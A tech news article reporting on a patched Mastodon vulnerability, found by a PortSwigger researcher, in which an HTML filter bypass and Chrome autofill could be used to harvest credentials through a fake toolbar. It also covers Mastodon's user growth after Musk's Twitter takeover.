Mastodon Fixes Bug That Exposed Users to Credential Theft

Photo Depicting the Mastodon iOS App

Mastodon has fixed a vulnerability on its infosec.exchange server that allowed hackers to spoof verification and steal users’ credentials, a PortSwigger researcher revealed on Tuesday.

Mastodon, a “decentralized social media” platform, has seen its daily users increase significantly over the past weeks in the wake of Elon Musk’s takeover of Twitter. But its decision to allow anyone to inject HTML may expose users to privacy risks.

PortSwigger researcher Gareth Heyes could swipe users’ passwords on Mastodon by taking advantage of an HTML filter bypass and exploiting Google Chrome’s autofill feature.

Heyes injected code to spoof a toolbar on Mastodon, and when users clicked on the toolbar, their credentials were sent to an external server.

After receiving a report about the security flaw, Mastodon released an update to address the issue. The fix is now available for download on GitHub.

Spoofed Password Forms

Heyes could steal passwords from Mastodon users due to a bug in “Glitch,” — a project linked to the platform. He released a proof-of-concept report on Tuesday, including a video showing how he exploited the flaw.

After injecting a “:verified:” code added a fake “blue tick” next to his Mastodon username, Heyes realized he could bypass Mastodon’s HTML filter and add new code to the site.

While he couldn’t circumvent Mastodon’s “strict” Content Security Policy (CSP), he could extract passwords by injecting fake forms and taking advantage of Chrome’s autofill function.

Ultimately, Heyes could access users’ credentials if they clicked on the fake Mastodon toolbar he created.

“Add the PoC code into the post text area and hit publish – [the] user sees [the] post and clicks on what they think is a Mastodon toolbar. Credentials are sent to an external server,” he told PortSwigger’s news site, The Daily Swig. “In a real attack the credentials will be stored and the user redirected back to the site.”

According to Heyes, “form-action directive” and “user interaction when filling in passwords” could prevent attacks of this nature.

Mastodon on the Rise

Although Mastodon has been around since 2016, it only started basking in the spotlight recently. Since October, almost 500,000 users have joined the platform.

Twitter lost around 1.3 million users between Oct. 27 and Nov. 1, according to an analysis by online behavior tracking firm Bot Sentinel.

Earlier this month, Mastodon founder Eugene Rochko said the platform has over one million active users and 1,000 new servers.

“135k (!!) users joined yesterday,” MIT associate professor Esteban Moro tweeted on Nov. 8.

“I’m going to need a logarithmic scale pretty soon,” he added, alluding to the surprising spike in Mastodon’s user base. Moro’s tweet includes a graph showing how Mastodon’s daily users climbed following Musk’s acquisition of Twitter.

While it appears Twitter is losing users at a fast pace, last week, Musk said its user base has “increased significantly” since his takeover of the company.

Are you interested in learning how to secure your online accounts and keep your passwords from falling into the hands of threat actors? We recommend using a password manager. Our article on the best password managers of 2022 contains our top picks.

Tech researcher & communications specialist
Mirza has an education background in Global Communications, has worked in advertising, marketing, journalism and television over the years while living in several different countries. He is now working to consolidate news and outreach at VPNoverview.com, while in his free time he likes to work on documentary projects, read about sociology and write about world events.